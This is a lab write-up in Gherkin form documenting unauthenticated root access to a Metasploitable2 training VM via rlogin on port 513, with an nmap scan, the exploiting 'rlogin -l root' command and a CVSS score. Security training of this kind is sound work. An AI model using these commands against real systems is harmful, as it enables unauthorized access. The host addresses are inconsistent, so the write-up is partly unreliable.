## Version 1.4.1
## language: en

Feature:
  TOE:
    Metasploitable2
  Location:
    192.168.0.11:513 TCP
  CWE:
    CWE-287: Improper Authentication
  Rule:
    REQ.086: Generate alarms on security events
  Goal:
    Get remotely access to Metasploitable2 machine
  Recommendation:
    block connections to port 513

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali-rolling    | 2019.1      |
    | Mozilla Firefox | 64.4.0      |
    | Nmap            | 7.70        |
  TOE information:
    Given I am running Metasploitable 2 on VM VirtualBox
    And Apache version is 2.2.8
    And PHP version 5.2.4
    And is running on Metasploitable 2 with kernel 2.6.24

  Scenario: Normal use case
  Get access to the machine by of the url
    Given I access using the ip from metasploitable2
    """
    192.168.1.151
    """
    And see a list from web applications

  Scenario: Static detection
  No code available for this vulnerability

  Scenario: Dynamic detection
  The port 513 is open
    Given I make a scan for detect ports open in Metasploitable2 machine
    """
    $ nmap -sV 192.168.1.151
    """
    And I see that the port 513 is open
    """
    513/tcp  open  login
    """
    Then I can conclude that anyone can get access remotely

  Scenario: Exploitation
  Use rsh-client to get access as root
    Given The port 513 is open
    And The ip from metasploitable2 is:
    """
    192.168.1.151
    """
    And Using the following command to get access
    """
    $rlogin -l root 192.168.1.151
    """
    Then I get access as root to the metasploitable2 [evidence](root.png)

  Scenario: Remediation
  No code available for this vulnerability

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.4/10 (High) - AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.7/10 (Medium) - E:P/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    5.7/10 (Medium) - CR:L/IR:M/AR:L

  Scenario: Correlations
    No correlations have been found to this date 2019-03-28
